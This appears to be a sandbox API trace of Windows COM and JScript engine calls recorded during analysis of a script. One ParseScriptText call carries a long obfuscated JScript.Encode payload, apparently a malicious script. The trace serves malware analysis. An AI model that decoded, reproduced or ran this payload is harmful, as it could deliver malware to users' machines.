[0038.602] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.602] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c708 | out: ppvObject=0x18c708*=0x0) returned 0x80004002 [0038.602] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c680 | out: ppvObject=0x18c680*=0x0) returned 0x80004002 [0038.602] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c688 | out: ppvObject=0x18c688*=0x3971e0) returned 0x0 [0038.602] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c6f0 | out: ppv=0x18c6f0*=0x36ab70) returned 0x0 [0038.602] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.602] IUnknown:Release (This=0x3971e0) returned 0x9 [0038.602] IUnknown:QueryInterface (in: This=0x2cd250, riid=0x7fef34147d0*(Data1=0xfe7c4271, Data2=0x210c, Data3=0x448d, Data4=([0]=0x9f, [1]=0x54, [2]=0x76, [3]=0xda, [4]=0xb7, [5]=0x4, [6]=0x7b, [7]=0x28)), ppvObject=0x3bfbd0 | out: ppvObject=0x3bfbd0*=0x2cd298) returned 0x0 [0038.602] IUnknown:QueryInterface (in: This=0x2cd250, riid=0x7fef34147f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c960 | out: ppvObject=0x18c960*=0x2cd260) returned 0x0 [0038.602] IActiveScriptProperty:SetProperty (This=0x2cd260, dwProperty=0x70000002, pvarIndex=0x0, pvarValue=0x18c930*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0 [0038.602] IUnknown:Release (This=0x2cd260) returned 0x5 [0038.602] IUnknown:Release (This=0x2cd250) returned 0x4 [0038.602] IUnknown:Release (This=0x2cd258) returned 0x3 [0038.602] IActiveScriptParse64:ParseScriptText (in: This=0x2cd258, pstrCode=" ", pstrItemName="window", punkContext=0x0, pstrDelimiter=0x0, dwSourceContextCookie=0xffffffffffffffff, ulStartingLineNumber=0x0, dwFlags=0x22, pvarResult=0x18cc40, pexcepinfo=0x0 | out: pvarResult=0x18cc40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2cc538, varVal2=0x368029df40000000), pexcepinfo=0x0) returned 0x0 [0038.602] GetCurrentThreadId () returned 0xa40 [0038.603] IUnknown:AddRef (This=0x3bfb50) returned 0x5 [0038.603] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c838 | out: ppv=0x18c838*=0x36ab70) returned 0x0 [0038.604] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.604] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c888 | out: ppv=0x18c888*=0x36ab70) returned 0x0 [0038.604] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.604] ISystemDebugEventFire:IsActive (This=0x3a5590) returned 0x1 [0038.604] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c828 | out: ppv=0x18c828*=0x36ab70) returned 0x0 [0038.604] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.604] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c518 | out: ppvObject=0x18c518*=0x0) returned 0x80004002 [0038.604] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c490 | out: ppvObject=0x18c490*=0x0) returned 0x80004002 [0038.604] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c498 | out: ppvObject=0x18c498*=0x3971e0) returned 0x0 [0038.604] GetCurrentThreadId () returned 0xa40 [0038.604] IActiveScriptSite:OnEnterScript (This=0x3bfb50) returned 0x0 [0038.604] GetCurrentThreadId () returned 0xa40 [0038.605] IActiveScriptSite:OnLeaveScript (This=0x3bfb50) returned 0x0 [0038.605] ISystemDebugEventFire:IsActive (This=0x3a5590) returned 0x1 [0038.605] IUnknown:Release (This=0x3bfb50) returned 0x4 [0038.606] GetCurrentThreadId () returned 0xa40 [0038.612] DllGetClassObject (in: rclsid=0x3764b0*(Data1=0xf414c262, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7fefe9b6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18b300 | out: ppv=0x18b300*=0x2cff70) returned 0x0 [0038.614] GetUserDefaultLCID () returned 0x409 [0038.614] GetACP () returned 0x4e4 [0038.614] IUnknown:AddRef (This=0x2cea40) returned 0x2 [0038.614] IUnknown:Release (This=0x2cea40) returned 0x1 [0038.614] JScriptEncode:IUnknown:Release (This=0x2cff70) returned 0x0 [0038.614] IUnknown:QueryInterface (in: This=0x2cea40, riid=0x7fef34147a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18c568 | out: ppvObject=0x18c568*=0x2cea40) returned 0x0 [0038.614] IUnknown:Release (This=0x2cea40) returned 0x1 [0038.614] IUnknown:QueryInterface (in: This=0x2cea40, riid=0x7fef34147b0*(Data1=0xc7ef7658, Data2=0xe1ee, Data3=0x480e, Data4=([0]=0x97, [1]=0xea, [2]=0xd5, [3]=0x2c, [4]=0xb4, [5]=0xd7, [6]=0x6d, [7]=0x17)), ppvObject=0x18c668 | out: ppvObject=0x18c668*=0x2cea48) returned 0x0 [0038.614] IUnknown:QueryInterface (in: This=0x2cea40, riid=0x7fef34147f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c648 | out: ppvObject=0x18c648*=0x2cea50) returned 0x0 [0038.614] IActiveScriptProperty:SetProperty (This=0x2cea50, dwProperty=0x4000, pvarIndex=0x0, pvarValue=0x18c680*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0)) returned 0x0 [0038.614] IUnknown:Release (This=0x2cea50) returned 0x2 [0038.614] IUnknown:AddRef (This=0x2cea40) returned 0x3 [0038.614] IUnknown:AddRef (This=0x2cea48) returned 0x4 [0038.614] IUnknown:QueryInterface (in: This=0x2cea40, riid=0x7fef34147f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c470 | out: ppvObject=0x18c470*=0x2cea50) returned 0x0 [0038.614] IActiveScriptProperty:SetProperty (This=0x2cea50, dwProperty=0x70000001, pvarIndex=0x0, pvarValue=0x18c440*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x80004001 [0038.614] IUnknown:Release (This=0x2cea50) returned 0x4 [0038.614] IActiveScriptParse64:InitNew (This=0x2cea48) returned 0x0 [0038.614] IActiveScript:SetScriptSite (This=0x2cea40, pass=0x3bfc00) returned 0x0 [0038.614] GetCurrentThreadId () returned 0xa40 [0038.615] IUnknown:QueryInterface (in: This=0x3bfc00, riid=0x7fef3c65d38*(Data1=0x539698a0, Data2=0xcdca, Data3=0x11cf, Data4=([0]=0xa5, [1]=0xeb, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x47, [6]=0xa0, [7]=0x63)), ppvObject=0x2cf218 | out: ppvObject=0x2cf218*=0x3bfc20) returned 0x0 [0038.615] IUnknown:AddRef (This=0x3bfc00) returned 0x3 [0038.615] IActiveScriptSite:GetLCID (in: This=0x3bfc00, plcid=0x18c478 | out: plcid=0x18c478*=0x409) returned 0x0 [0038.615] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0038.615] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18c400, cchData=6 | out: lpLCData="1252") returned 5 [0038.615] IsValidCodePage (CodePage=0x4e4) returned 1 [0038.615] IActiveScriptSite:OnScriptTerminate (This=0x3bfc00, pvarResult=0x5, pexcepinfo=0x20) returned 0x0 [0038.615] CoCreateInstance (in: rclsid=0x7fef3c65d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef3c65d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2cedb0 | out: ppv=0x2cedb0*=0x3a5b40) returned 0x0 [0038.615] IUnknown:AddRef (This=0x3a5b40) returned 0x2 [0038.615] GetCurrentProcessId () returned 0xa3c [0038.615] GetCurrentThreadId () returned 0xa40 [0038.615] GetTickCount () returned 0x11aef [0038.615] ISystemDebugEventFire:BeginSession (This=0x3a5b40, guidSourceID=0x7fef3c65da8, strSessionName="JScript:00002620:00002624:18072431") returned 0x0 [0038.615] IActiveScript:GetScriptState (in: This=0x2cea40, pssState=0x18c490 | out: pssState=0x18c490*=5) returned 0x0 [0038.615] IActiveScript:SetScriptState (This=0x2cea40, ss=1) returned 0x0 [0038.615] IActiveScriptSite:OnScriptTerminate (This=0x3bfc00, pvarResult=0x1, pexcepinfo=0x0) returned 0x0 [0038.615] IActiveScript:AddNamedItem (This=0x2cea40, pstrName="window", dwFlags=0xe) returned 0x0 [0038.615] GetCurrentThreadId () returned 0xa40 [0038.615] IActiveScriptSite:GetItemInfo (in: This=0x3bfc00, pstrName="window", dwReturnMask=0x1, ppiunkItem=0x18c340, ppti=0x0 | out: ppiunkItem=0x18c340*=0x3971e0, ppti=0x0) returned 0x0 [0038.615] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c438 | out: ppvObject=0x18c438*=0x3971e0) returned 0x0 [0038.615] IUnknown:Release (This=0x3971e0) returned 0xb [0038.615] IUnknown:AddRef (This=0x3971e0) returned 0xc [0038.615] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c3b8 | out: ppvObject=0x18c3b8*=0x0) returned 0x80004002 [0038.615] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c330 | out: ppvObject=0x18c330*=0x0) returned 0x80004002 [0038.615] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c338 | out: ppvObject=0x18c338*=0x3971e0) returned 0x0 [0038.615] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c3a0 | out: ppv=0x18c3a0*=0x36ab70) returned 0x0 [0038.615] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.615] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c378 | out: ppvObject=0x18c378*=0x0) returned 0x80004002 [0038.615] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c2f0 | out: ppvObject=0x18c2f0*=0x0) returned 0x80004002 [0038.616] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c2f8 | out: ppvObject=0x18c2f8*=0x3971e0) returned 0x0 [0038.616] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c360 | out: ppv=0x18c360*=0x36ab70) returned 0x0 [0038.616] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.616] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c378 | out: ppvObject=0x18c378*=0x0) returned 0x80004002 [0038.616] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c2f0 | out: ppvObject=0x18c2f0*=0x0) returned 0x80004002 [0038.616] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c2f8 | out: ppvObject=0x18c2f8*=0x3971e0) returned 0x0 [0038.616] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c360 | out: ppv=0x18c360*=0x36ab70) returned 0x0 [0038.616] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.616] IUnknown:Release (This=0x3971e0) returned 0xe [0038.616] IUnknown:QueryInterface (in: This=0x2cea40, riid=0x7fef34147d0*(Data1=0xfe7c4271, Data2=0x210c, Data3=0x448d, Data4=([0]=0x9f, [1]=0x54, [2]=0x76, [3]=0xda, [4]=0xb7, [5]=0x4, [6]=0x7b, [7]=0x28)), ppvObject=0x3bfc80 | out: ppvObject=0x3bfc80*=0x2cea88) returned 0x0 [0038.616] IUnknown:QueryInterface (in: This=0x2cea40, riid=0x7fef34147f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c5d0 | out: ppvObject=0x18c5d0*=0x2cea50) returned 0x0 [0038.616] IActiveScriptProperty:SetProperty (This=0x2cea50, dwProperty=0x70000002, pvarIndex=0x0, pvarValue=0x18c5a0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0038.616] IUnknown:Release (This=0x2cea50) returned 0x5 [0038.616] IUnknown:QueryInterface (in: This=0x2cd250, riid=0x7fef34147f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c5d0 | out: ppvObject=0x18c5d0*=0x2cd260) returned 0x0 [0038.616] IActiveScriptProperty:SetProperty (This=0x2cd260, dwProperty=0x70000002, pvarIndex=0x0, pvarValue=0x18c5a0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0038.616] IUnknown:Release (This=0x2cd260) returned 0x4 [0038.616] IUnknown:Release (This=0x2cea40) returned 0x4 [0038.616] IUnknown:Release (This=0x2cea48) returned 0x3 [0038.616] IActiveScriptParse64:ParseScriptText (in: This=0x2cea48, pstrCode="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` 